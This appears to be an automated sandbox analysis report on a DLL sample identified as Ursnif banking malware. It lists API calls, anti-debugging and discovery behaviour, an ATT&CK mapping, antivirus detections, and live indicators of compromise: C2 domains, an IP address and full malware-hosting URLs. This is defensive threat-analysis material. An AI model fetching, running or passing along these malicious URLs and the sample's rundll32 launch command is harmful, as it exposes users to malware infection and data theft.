Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6044, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 5.9 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 5.9 %

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6524

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4E0B15 FindFirstFileExW,	0_2_6D4E0B15
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_007A4E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_007A4E9C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4E0B15 FindFirstFileExW,	2_2_6D4E0B15
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4E0B15 FindFirstFileExW,	3_2_6D4E0B15
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4E0B15 FindFirstFileExW,	5_2_6D4E0B15

Source: regsvr32.exe, 00000002.00000002.1094118595.0000000000C3F000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 00000002.00000002.1094015467.0000000000BCA000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW@m

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4DBD49 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6D4DBD49

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4A1F31 LoadLibraryA,GetProcAddress,

0_2_6D4A1F31

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4E061C mov eax, dword ptr fs:[00000030h]	0_2_6D4E061C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4DF1BF mov eax, dword ptr fs:[00000030h]	0_2_6D4DF1BF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D50B242 mov eax, dword ptr fs:[00000030h]	0_2_6D50B242
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D50B178 mov eax, dword ptr fs:[00000030h]	0_2_6D50B178
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D50AD7F push dword ptr fs:[00000030h]	0_2_6D50AD7F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4E061C mov eax, dword ptr fs:[00000030h]	2_2_6D4E061C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4DF1BF mov eax, dword ptr fs:[00000030h]	2_2_6D4DF1BF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D50B242 mov eax, dword ptr fs:[00000030h]	2_2_6D50B242
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D50B178 mov eax, dword ptr fs:[00000030h]	2_2_6D50B178
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D50AD7F push dword ptr fs:[00000030h]	2_2_6D50AD7F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4E061C mov eax, dword ptr fs:[00000030h]	3_2_6D4E061C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4DF1BF mov eax, dword ptr fs:[00000030h]	3_2_6D4DF1BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D50B242 mov eax, dword ptr fs:[00000030h]	3_2_6D50B242
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D50B178 mov eax, dword ptr fs:[00000030h]	3_2_6D50B178
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D50AD7F push dword ptr fs:[00000030h]	3_2_6D50AD7F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4E061C mov eax, dword ptr fs:[00000030h]	5_2_6D4E061C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4DF1BF mov eax, dword ptr fs:[00000030h]	5_2_6D4DF1BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D50B242 mov eax, dword ptr fs:[00000030h]	5_2_6D50B242
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D50B178 mov eax, dword ptr fs:[00000030h]	5_2_6D50B178
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D50AD7F push dword ptr fs:[00000030h]	5_2_6D50AD7F

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4DBD49 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D4DBD49
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4DBECB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6D4DBECB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4DEACE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D4DEACE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4DBD49 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6D4DBD49
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4DBECB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6D4DBECB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_6D4DEACE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6D4DEACE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4DBD49 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6D4DBD49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4DBECB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6D4DBECB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4DEACE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6D4DEACE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4DBD49 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6D4DBD49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4DBECB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_6D4DBECB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6D4DEACE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6D4DEACE

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 34.95.62.189 80			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: raw.pablowilliano.at

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\1.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.1094450430.0000000001220000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.1095495336.00000000030A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1095379754.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.1095372641.0000000002F80000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.1094450430.0000000001220000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.1095495336.00000000030A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1095379754.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.1095372641.0000000002F80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1094450430.0000000001220000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.1095495336.00000000030A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1095379754.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.1095372641.0000000002F80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1094450430.0000000001220000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.1095495336.00000000030A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1095379754.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.1095372641.0000000002F80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4DBB69 cpuid

0_2_6D4DBB69

Source: C:\Windows\System32\loaddll32.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

0_2_6D4A1566

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4A1979 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_6D4A1979

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_007A3946 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

2_2_007A3946

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4A146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6D4A146C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.784548777.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.785832858.0000000000410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.789858287.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.784546208.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.rundll32.exe.6d4a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6d4a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6d4a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.ad8cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.418cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.968cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.ab8cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.6d4a0000.6.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000005.00000003.948292780.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948361474.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924061110.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948383297.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924111198.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021984816.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948140417.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021661815.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948411963.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924023449.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834584319.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021969620.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948218371.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923759658.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1069724529.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834728970.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948264474.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021951611.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021715602.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1097599278.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923586250.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923924528.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834525873.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021915260.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834645544.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834791862.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834491785.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923995924.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948327739.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834773952.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834682087.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924095906.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021871881.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021806353.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4240, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 7160, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6044, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.784548777.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.785832858.0000000000410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.789858287.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.784546208.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.rundll32.exe.6d4a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6d4a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6d4a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.regsvr32.exe.ad8cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.418cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.968cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.ab8cfa.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.6d4a0000.6.unpack, type: UNPACKEDPE

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000005.00000003.948292780.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948361474.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924061110.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948383297.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924111198.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021984816.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948140417.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021661815.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948411963.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924023449.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834584319.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021969620.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948218371.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923759658.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1069724529.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834728970.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948264474.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021951611.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021715602.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1097599278.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923586250.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923924528.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834525873.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021915260.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834645544.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834791862.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834491785.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.923995924.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.948327739.0000000004E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834773952.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.834682087.0000000005298000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.924095906.00000000052C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021871881.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1021806353.00000000037F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4240, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 7160, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6044, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	Input Capture1	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API2	Boot or Logon Initialization Scripts	Process Injection112	Obfuscated Files or Information2	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing1	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	DLL Side-Loading1	NTDS	System Information Discovery34	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion1	Cached Domain Credentials	Security Software Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Virtualization/Sandbox Evasion1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Regsvr321	Proc Filesystem	Process Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Rundll321	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.2.rundll32.exe.450000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
0.2.loaddll32.exe.a80000.0.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
2.2.regsvr32.exe.7a0000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
3.2.rundll32.exe.990000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File

Domains

Source	Detection	Scanner	Link
authd.feronok.com	10%	Virustotal	Browse
tls13.taboola.map.fastly.net	0%	Virustotal	Browse
raw.pablowilliano.at	9%	Virustotal	Browse
edge.gycpi.b.yahoodns.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://raw.pablowilliano.at/5rrnAaWEJjP00b_2B56737/B1AfZAlhUgHoA/b2t_2BN4/l5OkLy1VlWuDrrdEILRWWeb/E6W61j9yq8/abuhFDsODTcGxVnWQ/E_2BE3e1OTvy/3WD7TSUbyOm/cpm4396P_2Fjd0/pOy7riIEzmJp_2FxZmWLM/gNpof3_2FnlsfWUd/1743QqIgg_2FQRu/ZKVtHnC8C1xvmv_2B8/vHh2F1obc/m3eV0F3yYMczZiknu1Ew/H6Bi_2BTSpyXLXazxZH/wg8NqLvm2lSF1HlaU3pANa/1U6Z_2BZLYJJ_/2BlaNQcq/ledo9CFvcm_2F6MjGWcFo9L/RAKX4mmp_2/F_2FxtA6ZOAujrSBZ/4yu9h7z	100%	Avira URL Cloud	malware
http://raw.pablowilliano.at/eRS3IPULaBVyyyM8SI7NTjn/bu9jriHj6t/_2BkcuH0S0KLaBS3B/vkCN9MDcpDQw/CXvn1Uc9Lk5/eTvtAYmWtMxfAC/IbcZg8p7Nqfw4xi6JFwgY/iX8lYPiI0RfUKruW/cRS7MvLhOTcIXvx/A_2F5SdmT8BNOtLhIu/P7uLQkYdw/iuMR5Z51enQS4ZwsoBTP/Dtp84_2B7PB4d6Ih_2F/AlW2oiOiFE_2FnyCSEdY9y/vWCqa6t9PLYnR/oBTHljmW/b1W1259HTZYZTaG9O2900Q0/yz_2FOFMzC/llouIHAJZHwF3f0aR/_2FSLB7YfaTL/BdH925d4dS3/7iDYe3o7fiS/Pl	100%	Avira URL Cloud	malware
http://raw.pablowilliano.at/sX4dtwL7bay/rzZGwpnfzczFz3/LsBuX9huxqt_2FdLEMzat/b0BQWHIzHX0afe_2/FzCUWE	100%	Avira URL Cloud	malware
https://onedrive.live.com;Fotos	0%	Avira URL Cloud	safe
http://authd.feronok.com/tTVUy7Cis4PjZzw3zlK90/992fZ2V2UadpUOjx/ZlFfFNzzz_2BNMC/rw9ORkrACS_2FSnAjs/_2FkBi36_/2BcKHehCiVzJ0ZlxZwUe/L605o3IJbqARL43QjWI/5xKrHdjyff8x2rKCgmO7Mu/SD9GyKc_2FBsi/PnW3TDEt/vmXdCw3sFAveNrYKm6TcRex/ohSiZG5THC/3RxSnoz2RW1R2SJHo/_2BwMcdQnslY/eZbgGLoqDt1/hcHL1ijHz1HAC4/B1wguCo7y8KJKFrVLMood/ADnIvNjKfSqFXvOX/vfzJTRrlv1hKd_2/FiJ_2B9pSc20z1/m	100%	Avira URL Cloud	malware
http://raw.pablowilliano.at/V0Zdil_2B8IErAOIy/9Ot8_2B759bg/T54gq_2BJbB/fEKg5_2BdBbLTl/sPD_2B_2FnvdcE	100%	Avira URL Cloud	malware
http://authd.feronok.com/favicon.ico	100%	Avira URL Cloud	malware
http://authd.feronok.com/dgzEbQ4OdHi6vrZ8TXtj/42P6D_2FQzGJBqjHjxr/k7tYCNr_2BHR8cgUzK_2Bs/fZKbEnCTwoi	100%	Avira URL Cloud	malware
http://authd.feronok.com/hmMzQKK9IpZemMI/AV6w9eELu1YSVPBd2B/U2fmYepaP/iI8O34L03l282SsJYJjt/THEo6G77t	100%	Avira URL Cloud	malware
